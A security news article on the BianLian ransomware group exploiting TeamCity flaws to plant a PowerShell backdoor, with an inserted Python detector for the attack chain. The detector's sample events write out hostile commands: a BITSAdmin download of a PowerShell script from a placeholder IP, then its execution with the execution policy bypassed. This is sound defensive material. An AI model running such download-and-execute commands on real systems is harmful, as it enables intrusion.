BianLian Hackers Up Their Game: New Ransomware Tactics Target TeamCity Servers


The BianLian ransomware group, known for its focus on extortion, has been observed exploiting vulnerabilities in JetBrains TeamCity software to deploy malicious PowerShell backdoors. This finding highlights BianLian’s ability to adapt and adopt new techniques to infiltrate target networks.

GuidePoint Security researchers discovered a recent BianLian attack that began with exploiting a vulnerability (CVE-2024-27198 or CVE-2023-42793) in a TeamCity server. This initial breach allowed the attackers to create user accounts and execute malicious commands.

Following this initial foothold, the attackers used legitimate tools such as WinPty to execute commands and BITSAdmin to download a malicious PowerShell script (web.ps1), along with communication tools used to connect to their command and control (C2) server.
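As an added illustration (not code from the article or from GuidePoint's report), the Python below flags the chain described above in a handful of constructed process-creation events: a shell spawned under a TeamCity process, BITSAdmin fetching a .ps1 file, and PowerShell then running that downloaded file. The event schema, file paths, URL and job names are assumptions.

```python
import re

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed events in a simplified Sysmon Event ID 1 shape; not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\TeamCity\jre\bin\java.exe",          # assumed TeamCity install path
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c whoami"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 /download /priority high "
                r"http://203.0.113.10/web.ps1 C:\Users\Public\web.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\Users\Public\web.ps1"},
    {"parent": r"C:\Windows\explorer.exe",                # benign BITS use, must not fire
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer upd /download http://updates.example.test/p.msi C:\Temp\p.msi"},
]


def detect(events):
    """Return (event_index, rule_name) pairs for events matching the BianLian-style chain."""
    findings = []
    bits_destinations = set()          # local paths written by BITSAdmin, for correlation
    for i, ev in enumerate(events):
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        parent = ev["parent"].lower()
        cmd = ev["cmdline"]
        # Rule 1: TeamCity server/agent process spawning an interactive shell.
        if "teamcity" in parent and image in SHELLS:
            findings.append((i, "teamcity_spawned_shell"))
        # Rule 2: BITSAdmin used to pull a PowerShell script onto disk.
        if image == "bitsadmin.exe" and re.search(r"/transfer", cmd, re.I):
            dest = cmd.split()[-1]     # last argument is the local destination
            if dest.lower().endswith(".ps1"):
                findings.append((i, "bitsadmin_fetches_powershell_script"))
                bits_destinations.add(dest.lower())
        # Rule 3: PowerShell executing a file that an earlier BITS job wrote.
        if image in {"powershell.exe", "pwsh.exe"}:
            if any(d in cmd.lower() for d in bits_destinations):
                findings.append((i, "powershell_runs_bits_downloaded_script"))
    return findings


if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```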

PowerShell Backdoor Deployment

While BianLian traditionally uses custom Go-based backdoors, this instance involved a PowerShell backdoor. This backdoor, though obfuscated, was deconstructed by GuidePoint researchers. Analysis revealed functionalities similar to BianLian’s Go backdoor, including network connections, execution of commands, and asynchronous operations for stealth.

Attribution to BianLian

Researchers linked the PowerShell backdoor to BianLian by analyzing communication parameters and cross-referencing IP addresses with known BianLian infrastructure. Additionally, Microsoft’s AV signature Win64/BianDoor.D further solidified this attribution.

Importance of Proactive Security

This incident underscores the importance of prioritizing security practices like patching vulnerabilities, having a robust incident response plan, and incorporating threat intelligence into penetration testing. Implementing a proactive security posture along with effective response capabilities is crucial to defend against evolving tactics used by BianLian and other cyber adversaries.

Author

  • Maya Pillai is a tech writer with 20+ years of experience curating engaging content. She can translate complex ideas into clear, concise information for all audiences.
